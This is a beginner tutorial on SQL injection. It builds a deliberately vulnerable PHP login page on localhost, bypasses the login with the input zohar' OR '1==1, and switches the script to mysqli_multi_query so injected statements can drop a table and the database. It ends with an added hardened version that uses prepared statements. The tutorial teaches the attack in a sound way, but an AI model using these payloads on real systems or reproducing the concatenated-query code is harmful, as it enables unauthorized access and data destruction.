
SQL INJECTION


What is SQL INJECTION


  • SQL injection is a way of gaining unauthorized access to a database.
  • After successfully authenticating through SQL injection, the attacker tries to damage or destroy the database, or harm it in some other way.
  • A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.
  • In SQL injection we try to use SQL comments or Boolean logic (i.e. OR and AND clauses) to get data from the database.

How to perform a basic SQL injection


Make a basic HTML form page without any front-end validation.
Make a folder named test in your localhost directory (/var/www/html/test, or htdocs in XAMPP),
then add this simple HTML form to it as index.html:

<!DOCTYPE html>
<html>
<body>
<form action="action.php" method="post">
<div>
<h2><b>Please Enter Details</b></h2>
Name:<input type="text" name="name">
Password:<input type="password" name="pass">
<input type="submit" value="Submit">
</div>
</form>
<style>
body{
color:blue;
background-color:purple;}
form{margin-left:10%;
margin-right:30%;
margin-top:5%;
background-color:yellow;
}
div{
padding-left:10%;
padding-bottom:5%;
}
input{
padding-bottom:10px;
display:block;
margin-bottom:3%;
}
</style>
</body>
</html>


Then open it on localhost.
Make another PHP page and save it as action.php:

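<?php
// Deliberately vulnerable login check used for this demonstration.
$username=$_POST['name'];
$password=$_POST['pass'];
$con=mysqli_connect('localhost','root','root','test');

// The form values are pasted straight into the SQL string.
$query=mysqli_query($con,"SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'");
// Uncomment the next line to print the query that is sent to MySQL.
//echo "SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'";
if(mysqli_num_rows($query)==1)
    echo "Sucessful";
else
    echo "failed";
?>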
Now go to phpMyAdmin, create a database named test, then add a table named login with this structure:

Then add a few entries as you wish:
INSERT INTO `login`(`username`, `password`) VALUES ([value-1],[value-2])

Now check whether you can log in by providing a correct username and password. If you provide an incorrect name or password, it prints failed.

With a wrong password it prints failed, as expected.
With SQL injection we will try to get in without providing the password and still get a successful result. If you uncomment the echo, you can see the query that is executed.
Example:
Suppose the database holds username="zohar" and password="1234".
If I provide name="zohar", leave the password blank and press submit:


  • SELECT * FROM `login` WHERE `username` = 'zohar' AND password= ''failed
Now, to get in, we provide name=zohar' OR '1==1, leave the password blank and submit:

  • SELECT * FROM `login` WHERE `username` = 'zohar' OR '1==1' AND password= ''Sucessful
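Now we are able to access the database successfully. AND binds more tightly than OR, so the condition is read as `username` = 'zohar' OR ('1==1' AND password= ''), and the row for zohar matches whatever the password is.
So providing zohar' OR '1==1 as the name let us in without the password.
If you open the SQL tab in phpMyAdmin,
type this query:
SELECT * FROM `login` WHERE `username` = 'YOUR USERNAME FROM DB' /* '' AND password= ''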


We can see that it executes successfully, with the password check commented out. But since mysqli provides protection against multi-line comments, we cannot inject with the multi-line comment /*.
mysqli also does not allow executing multiple queries like the previous mysql extension, so to drop a table or a database we have to check whether the mysqli_multi_query() function is used.
Now, to drop tables and the database, we change our PHP script:
<?php
$username=$_POST['name'];
$password=$_POST['pass'];
$con=mysqli_connect('localhost','root','root','test');

$query=mysqli_multi_query($con,"SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'");
echo "SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'";
if($query)
echo "Sucessful";
else
 echo "failed";
?>
Now we will first make a backup of our database.
Finally we will drop a table of the database.
To make the injected value visible, change the password input's type from password to text,
then simply do the following steps:


Now restore the database from the backup we created before.
Just as we dropped the table, we will now drop the database.



The test database is dropped.
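
Both the password bypass and the drop shown above depend on the form values being concatenated into the SQL string. The following is an added example, not part of the original post: action.php rewritten with a prepared statement, which sends the name as data and accepts only a single statement. It assumes the same test database and login table; the login_app account, the LOGIN_DB_PASS environment variable and the use of password_hash() for stored passwords are assumptions.

```php
<?php
// Added example: hardened action.php. The login_app account and the
// LOGIN_DB_PASS environment variable are hypothetical names.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

$username = $_POST['name'] ?? '';
$password = $_POST['pass'] ?? '';

// Reject non-string input (e.g. name[]=x arrays) and oversized values early.
if (!is_string($username) || !is_string($password)
    || $username === '' || strlen($username) > 64) {
    http_response_code(400);
    exit('failed');
}

try {
    // Least privilege: an account with SELECT on `login` only, not root,
    // so even a flawed query could not drop a table or database.
    $con = new mysqli('localhost', 'login_app', getenv('LOGIN_DB_PASS') ?: null, 'test');
    $con->set_charset('utf8mb4');

    // The ? placeholder sends $username as data, so a quote in it cannot
    // change the structure of the statement. prepare() takes one statement
    // only, unlike mysqli_multi_query().
    $stmt = $con->prepare('SELECT `password` FROM `login` WHERE `username` = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = $stmt->fetch(); // true = row fetched, null = no such user
    $stmt->close();
} catch (mysqli_sql_exception $e) {
    error_log('login query failed: ' . $e->getMessage()); // log, never echo SQL
    http_response_code(500);
    exit('failed');
}

// Assumption: the password column holds password_hash() output, not plaintext.
if ($found === true && password_verify($password, $storedHash)) {
    echo 'Successful';
} else {
    echo 'failed';
}
```

With this version, submitting zohar' OR '1==1 as the name simply looks up a user with that literal name and prints failed.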
